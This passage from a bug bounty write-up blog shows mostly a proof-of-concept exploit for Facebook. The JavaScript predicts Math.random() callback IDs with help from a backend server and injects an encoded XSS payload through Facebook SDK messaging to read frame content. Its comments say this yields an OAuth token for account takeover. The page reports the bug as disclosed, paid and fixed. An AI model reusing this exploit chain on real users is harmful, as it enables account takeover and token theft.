            <span class="k">if</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">code</span> <span class="o">&amp;&amp;</span> <span class="nx">e</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">num</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
                <span class="nx">xx</span> <span class="o">=</span> <span class="nx">e</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">num</span><span class="p">;</span>
                <span class="nx">value</span> <span class="o">=</span> <span class="nx">e</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span>
                <span class="nx">value</span> <span class="o">=</span> <span class="nf">toRandom</span><span class="p">(</span><span class="nx">value</span><span class="p">);</span>
                <span class="nx">list_math_random</span><span class="p">[</span><span class="nx">xx</span><span class="p">]</span> <span class="o">=</span> <span class="nx">value</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>
          <span class="c1">// Load the Facebook iframe to start the process</span>
          <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">theframe</span><span class="dl">"</span><span class="p">).</span><span class="nx">src</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">https://secure.facebook.com/business/goals/add-live-chat-to-website-with-messenger?wtsid=rdr_0JnaCVB7Xiu2W3gl6&amp;cquick=1&amp;cquick_token=</span><span class="dl">"</span><span class="o">+</span> 
          <span class="nx">cquick_token</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&amp;ctarget=https://www.facebook.com</span><span class="dl">"</span><span class="p">;</span>
          
          <span class="nx">xf</span> <span class="o">=</span> <span class="nf">setTimeout</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span>
                    <span class="nx">target_frame</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">reload</span><span class="dl">"</span><span class="p">).</span><span class="nx">contentWindow</span>
                    <span class="nf">sendMessageFromFacebookOrigin</span><span class="p">(</span><span class="dl">'</span><span class="s1">&amp;xd_action=dd&amp;data=FB_RPC:{"method":"fireEvent","params":["init:post",{"xfbml":1}]}</span><span class="dl">'</span><span class="p">,</span> <span class="nx">reload</span><span class="p">);</span>
                    <span class="nx">interv</span> <span class="o">=</span> <span class="nf">setInterval</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span>
                        <span class="k">try</span><span class="p">{</span>
                                <span class="c1">// Detect when the iframes are loaded</span>
                                <span class="nb">window</span><span class="p">.</span><span class="nx">frames</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">frames</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nf">postMessage</span><span class="p">(</span><span class="dl">"</span><span class="s2">testing</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
                                <span class="k">for</span><span class="p">(</span><span class="nx">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nx">i</span><span class="o">&lt;</span><span class="nb">window</span><span class="p">.</span><span class="nx">frames</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">frames</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span><span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                                    <span class="c1">// Load a data URL that sends the frame's name back to the parent</span>
                                    <span class="nx">ff</span> <span class="o">=</span> <span class="dl">'</span><span class="se">\</span><span class="s1">x3chtml&gt;</span><span class="se">\</span><span class="s1">x3cbody&gt;</span><span class="se">\</span><span class="s1">x3cscript&gt;f={"code":1,"num":</span><span class="dl">'</span><span class="o">+</span><span class="nx">i</span><span class="o">+</span><span class="dl">'</span><span class="s1">,"data":window.name};top.postMessage(f,"*")</span><span class="se">\</span><span class="s1">x3c/script&gt;</span><span class="se">\</span><span class="s1">x3c/body&gt;</span><span class="se">\</span><span class="s1">x3c/html&gt;</span><span class="dl">'</span><span class="p">;</span>
                                    <span class="nx">ff</span> <span class="o">=</span> <span class="nf">btoa</span><span class="p">(</span><span class="nx">ff</span><span class="p">);</span>
                                    <span class="nb">window</span><span class="p">.</span><span class="nx">frames</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="nx">i</span><span class="p">].</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">data:text/html;base64,</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">ff</span><span class="p">;</span>
                                <span class="p">}</span>
                                <span class="nf">clearInterval</span><span class="p">(</span><span class="nx">interv</span><span class="p">);</span>
                        <span class="p">}</span>
                        <span class="k">catch</span><span class="p">{}</span>
                    
                    <span class="p">},</span> <span class="mi">1000</span> <span class="p">);</span>
                
          <span class="p">},</span> <span class="mi">20000</span> <span class="p">);</span>
        <span class="p">}</span>

        <span class="cm">/* ==================== STEP 2 ==================== */</span>

        <span class="c1">// Check if the list of Math.random() values is complete</span>
        <span class="nx">listcheck</span> <span class="o">=</span> <span class="nf">setInterval</span><span class="p">(()</span><span class="o">=&gt;</span><span class="p">{</span>
            <span class="k">if</span><span class="p">(</span><span class="nb">Object</span><span class="p">.</span><span class="nf">keys</span><span class="p">(</span><span class="nx">list_math_random</span><span class="p">).</span><span class="nx">length</span> <span class="o">&gt;</span><span class="mi">8</span><span class="p">)</span> <span class="p">{</span>
                <span class="nf">clearInterval</span><span class="p">(</span><span class="nx">listcheck</span><span class="p">);</span>
                <span class="nf">setTimeout</span><span class="p">(()</span><span class="o">=&gt;</span><span class="p">{</span>
                    <span class="nx">l</span> <span class="o">=</span> <span class="nb">Object</span><span class="p">.</span><span class="nf">values</span><span class="p">(</span><span class="nx">list_math_random</span><span class="p">);</span>

                    <span class="c1">// Try to xss with different combinations until we get valid values from the server ( Z3 Solver can hang sometimes )</span>
                    <span class="nf">start_xss</span><span class="p">(</span><span class="nx">l</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">5</span><span class="p">));</span>
                    <span class="nf">start_xss</span><span class="p">(</span><span class="nx">l</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">6</span><span class="p">));</span>
                    <span class="nf">start_xss</span><span class="p">(</span><span class="nx">l</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span><span class="mi">7</span><span class="p">));</span>
                    <span class="nf">start_xss</span><span class="p">(</span><span class="nx">l</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="mi">8</span><span class="p">));</span>
                    <span class="nf">start_xss</span><span class="p">(</span><span class="nx">l</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span><span class="mi">9</span><span class="p">));</span>
                    <span class="nf">start_xss</span><span class="p">(</span><span class="nx">l</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="mi">10</span><span class="p">));</span>
                    <span class="nf">start_xss</span><span class="p">(</span><span class="nx">l</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span><span class="mi">11</span><span class="p">));</span>
                    
                <span class="p">},</span><span class="mi">3000</span><span class="p">);</span>
            
                    
                <span class="p">}</span>
        <span class="p">},</span><span class="mi">2000</span><span class="p">);</span>
          
        <span class="cm">/* ==================== STEP 3 ==================== */</span>

        <span class="kd">function</span> <span class="nf">start_xss</span><span class="p">(</span><span class="nx">values_array</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="nx">str</span> <span class="o">=</span> <span class="nx">values_array</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="dl">"</span><span class="s2">,</span><span class="dl">"</span><span class="p">);</span>
            <span class="kd">const</span> <span class="nx">controller</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">AbortController</span><span class="p">()</span>
            <span class="kd">const</span> <span class="nx">timeoutId</span> <span class="o">=</span> <span class="nf">setTimeout</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span><span class="nx">controller</span><span class="p">.</span><span class="nf">abort</span><span class="p">()},</span> <span class="mi">5000</span><span class="p">)</span>
            
            <span class="c1">// Sends values to backend</span>
            <span class="nf">fetch</span><span class="p">(</span><span class="nx">BACKEND_URL</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">?id=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">str</span><span class="p">,{</span> <span class="na">signal</span><span class="p">:</span> <span class="nx">controller</span><span class="p">.</span><span class="nx">signal</span> <span class="p">}).</span><span class="nf">then</span><span class="p">(</span><span class="nx">response</span> <span class="o">=&gt;</span> <span class="nx">response</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span>
                   <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">response</span> <span class="o">=&gt;</span> <span class="p">{</span>
                       <span class="k">if</span><span class="p">(</span><span class="nx">response</span><span class="p">[</span><span class="dl">'</span><span class="s1">data</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">result</span><span class="dl">'</span><span class="p">]</span> <span class="o">==</span> <span class="dl">"</span><span class="s2">error</span><span class="dl">"</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
                       <span class="nx">data</span> <span class="o">=</span> <span class="nx">response</span><span class="p">[</span><span class="dl">'</span><span class="s1">data</span><span class="dl">'</span><span class="p">];</span>
                       <span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">,</span><span class="dl">"</span><span class="p">);</span>
                       <span class="nx">tests</span> <span class="o">=</span> <span class="nf">setInterval</span><span class="p">(()</span><span class="o">=&gt;</span><span class="p">{</span>
                        <span class="k">if</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">length</span><span class="o">==</span><span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
                           <span class="nf">clearInterval</span><span class="p">(</span><span class="nx">tests</span><span class="p">);</span>
                        <span class="p">}</span>
                        <span class="c1">// we have a match let's try sending the message</span>
                        <span class="nx">callbacks</span> <span class="o">=</span> <span class="nf">guid</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nf">shift</span><span class="p">());</span>
                        
                        <span class="c1">// payload : &amp;lt;img src=x onerror='parent.postMessage("body:" + parent.frames[0].document.body.innerHTML,"*")'/&amp;gt;</span>
                        <span class="nx">xss_payload</span> <span class="o">=</span> <span class="nx">callbacks</span><span class="o">+</span> <span class="dl">"</span><span class="s2">&amp;type=mpn.setupIconIframe&amp;frameName=test&amp;iconSVG=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%27%70%61%72%65%6e%74%2e%70%6f%73%74%4d%65%73%73%61%67%65%28%22%62%6f%64%79%3a%22%20%2b%20%70%61%72%65%6e%74%2e%66%72%61%6d%65%73%5b%30%5d%2e%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%2c%22%2a%22%29%27%2f%3e&amp;unreadCountCssText={}&amp;cssText={}&amp;availabilityStatusCssText={}&amp;greetingCssText={}</span><span class="dl">"</span><span class="p">;</span>

                        <span class="nx">target_frame</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">frames</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">frames</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
                        <span class="nf">sendMessageFromFacebookOrigin</span><span class="p">(</span><span class="nx">xss_payload</span><span class="p">,</span> <span class="nx">target_frame</span><span class="p">)</span>


                        <span class="c1">// Receive OAuth token</span>
                        <span class="nx">onmessage</span><span class="o">=</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span><span class="o">=&gt;</span><span class="p">{</span>
                            <span class="k">if</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nf">startsWith</span><span class="p">(</span><span class="dl">"</span><span class="s2">body:</span><span class="dl">"</span><span class="p">)){</span>
                                <span class="nf">clearInterval</span><span class="p">(</span><span class="nx">tests</span><span class="p">);</span>
                                <span class="nf">alert</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span>
                            <span class="p">}</span>
                        <span class="p">}</span>
                    <span class="p">},</span><span class="mi">7000</span><span class="p">);</span>
                   <span class="p">});</span>
    
        <span class="p">}</span>

        <span class="cm">/* ==================== Functions ==================== */</span>

        <span class="kd">function</span> <span class="nf">toRandom</span><span class="p">(</span><span class="nx">str</span><span class="p">)</span> <span class="p">{</span>
            <span class="nx">flt</span> <span class="o">=</span> <span class="nf">parseFloat2</span><span class="p">(</span><span class="nx">str</span><span class="p">,</span><span class="mi">8</span><span class="p">);</span>
            <span class="nx">fin</span> <span class="o">=</span> <span class="nx">flt</span> <span class="o">/</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">30</span><span class="p">);</span>
            <span class="k">if </span><span class="p">(</span><span class="nx">fin</span><span class="o">&gt;</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
                <span class="nx">flt</span> <span class="o">=</span> <span class="nf">parseFloat2</span><span class="p">(</span><span class="nx">str</span><span class="p">,</span><span class="mi">7</span><span class="p">);</span>
            <span class="p">}</span>
            <span class="k">return</span> <span class="nx">flt</span> <span class="o">/</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">30</span><span class="p">);</span>
            
        <span class="p">}</span>
        <span class="kd">function</span> <span class="nf">sendMessageFromFacebookOrigin</span><span class="p">(</span><span class="nx">msg</span><span class="p">,</span><span class="nx">ifrm</span><span class="p">){</span>
            <span class="nx">target</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">https://secure.facebook.com</span><span class="dl">"</span><span class="p">;</span>
            <span class="nx">ifrm</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="s2">`https://www.facebook.com/plugins/feedback.php?api_key&amp;channel_url=https://staticxx.facebook.com/x/connect/xd_arbiter/?version=42%23relation=parent.parent.frames[0]%26cb=</span><span class="p">${</span><span class="nf">encodeURIComponent</span><span class="p">(</span><span class="nx">msg</span><span class="p">)}</span><span class="s2">%26origin=</span><span class="p">${</span><span class="nx">target</span><span class="p">}</span><span class="s2">&amp;href=https%3A%2F%2Fwww.facebook.com%2Fbusiness%2Fnews%2F100-in-view-impressions-and-moat-partnership&amp;locale=en_US&amp;numposts=10&amp;order_by=time&amp;sdk=joey&amp;version=v2.3&amp;width=600&amp;_rdr`</span><span class="p">;</span>
            
        <span class="p">}</span>

        <span class="kd">function</span> <span class="nf">parseFloat2</span><span class="p">(</span><span class="nx">str</span><span class="p">,</span> <span class="nx">cof</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="nx">str</span> <span class="o">=</span> <span class="nx">str</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
            <span class="nx">str</span> <span class="o">=</span> <span class="nx">str</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="nx">cof</span><span class="p">)</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">.</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">str</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="nx">cof</span><span class="p">);</span>
            <span class="kd">var</span> <span class="nx">parts</span> <span class="o">=</span> <span class="nx">str</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">.</span><span class="dl">"</span><span class="p">);</span>
            <span class="k">if </span><span class="p">(</span> <span class="nx">parts</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">1</span> <span class="p">)</span>
            <span class="p">{</span>
                <span class="k">return</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">parts</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span> <span class="o">+</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">parts</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span> <span class="o">/</span> <span class="nb">Math</span><span class="p">.</span><span class="nf">pow</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span> <span class="nx">parts</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">length</span><span class="p">);</span>
            <span class="p">}</span>
            <span class="k">return</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">parts</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">16</span><span class="p">);</span>
        <span class="p">}</span>
        
        <span class="kd">function</span> <span class="nf">guid</span><span class="p">(</span><span class="nx">anystring</span><span class="p">)</span> <span class="p">{</span>
                        <span class="k">return</span> <span class="dl">"</span><span class="s2">f</span><span class="dl">"</span> <span class="o">+</span> <span class="p">(</span><span class="nx">anystring</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">30</span><span class="p">)).</span><span class="nf">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">).</span><span class="nf">replace</span><span class="p">(</span><span class="dl">"</span><span class="s2">.</span><span class="dl">"</span><span class="p">,</span> <span class="dl">""</span><span class="p">)</span>
                    <span class="p">}</span>


        <span class="nt">&lt;/script&gt;</span>
    <span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>

</code></pre></div></div>

<h1 id="impact">Impact</h1>
<hr />
<p><br />
This vulnerability enables account takeover of Facebook account if the user visits a link inside Facebook Application in mobile.</p>

<h2 id="timeline">Timeline</h2>
<hr />
<p><br />
Jun 22, 2023 — Bug reported</p>

<p>Jun 23, 2023 — Bug Acknowledged by Meta</p>

<p>Jun 28, 2023 — <strong>$66,000</strong> bounty awarded by Meta</p>

<p>Dec 15, 2023 — Bug fixed by Meta</p>

  </div><a class="u-url" href="/uncategorized/2026/01/17/math-random-facebook-sdk.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Youssef Sammouda (sam0) personal blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Youssef Sammouda (sam0) personal blog</li><li><a class="u-email" href="mailto:ysamm@proton.me">ysamm@proton.me</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">samm0uda</span></a></li><li><a href="https://www.twitter.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">samm0uda</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>The goal of this blog is to share write-ups about bugs i have found in Facebook and reported to them under the Facebook bug bounty program.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
